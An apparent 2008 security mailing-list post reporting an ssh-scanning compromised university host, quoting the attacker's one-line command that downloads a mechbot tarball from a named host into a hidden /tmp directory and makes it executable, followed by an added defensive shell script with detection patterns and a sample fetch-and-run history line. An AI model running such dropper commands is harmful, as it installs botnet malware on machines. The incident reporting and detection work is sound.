[nsp-sec] malware on thailanda.at.ua (steadfast Chicago)
Peter Peters
P.G.M.Peters at utwente.nl
Tue Sep 23 09:51:12 EDT 2008
A few weeks ago we got a system doing ssh scans. Because we didn't have
any capacity to examine the system we simply shut it down. This week we
were able to examine the system.
It turned out on Aug 30 06:59 we got a new directory "/tmp/.,".
Downloaded into it was a mechbot.
mkdir /tmp/., ; cd /tmp/., ; curl -O thailanda.at.ua/a.tgz ; tar xzvf a.tgz ; rm -rf a.tgz ; cd .a ; chmod 777 * ; chmod +x * ; nano mech.session
It appears the malware is still up on thailanda.at.ua.
--
Peter Peters, Teamleider Unix/Linux-Beheer
ICT-Servicecentrum
Universiteit Twente, Postbus 217, 7500 AE Enschede
Telefoon 053 489 2301, Fax 053 489 2383,
P.G.M.Peters at utwente.nl, http://www.utwente.nl/icts
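Added example, not part of the original post: shell helpers for triaging the two traces described above, a dot-directory whose name contains no letters or digits (like "/tmp/.,") and a shell-history line that downloads, unpacks and chmods in one chained command. The function names, the sample tree and the example.invalid URLs are constructed for illustration.

```shell
#!/bin/sh
# Added example: host triage for the pattern in the report above.

# List directories under $1 whose name starts with "." and contains no
# letters or digits (".,", "...", ". "), a common way to hide a drop
# directory from a casual "ls". The search root itself is skipped.
find_punct_dirs() {
    find "$1" -mindepth 1 -type d -name '.*' ! -name '*[a-zA-Z0-9]*' 2>/dev/null
}

# Print (with line numbers) history lines that fetch a file with curl or
# wget, then extract it with tar and chmod the result in the same chain.
flag_dropper_lines() {
    grep -nE '(curl|wget)[^;&|]*[;&|].*tar +-?[a-zA-Z]*x[a-zA-Z]* .*chmod' "$1"
}

# Build constructed sample data: a fake /tmp tree and a fake history file.
# Prints the path of the temporary directory that holds them.
make_sample() {
    _d=$(mktemp -d) || return 1
    mkdir -p "$_d/tmp/.,/.a" "$_d/tmp/.cache" "$_d/tmp/..."
    cat > "$_d/history" <<'EOF'
ls -la /var/log
curl -O http://example.invalid/a.tgz ; tar xzvf a.tgz ; rm -rf a.tgz ; chmod +x *
tar czf backup.tgz /etc
wget http://example.invalid/notes.txt
EOF
    printf '%s\n' "$_d"
}

# Run both checks against the constructed sample.
sample=$(make_sample)
echo "Suspicious directories:"
find_punct_dirs "$sample/tmp"
echo "Suspicious history lines:"
flag_dropper_lines "$sample/history"
rm -rf "$sample"
```

On a real host, point find_punct_dirs at world-writable locations such as /tmp, /var/tmp and /dev/shm, and compare the directory's timestamps with the first scan alert.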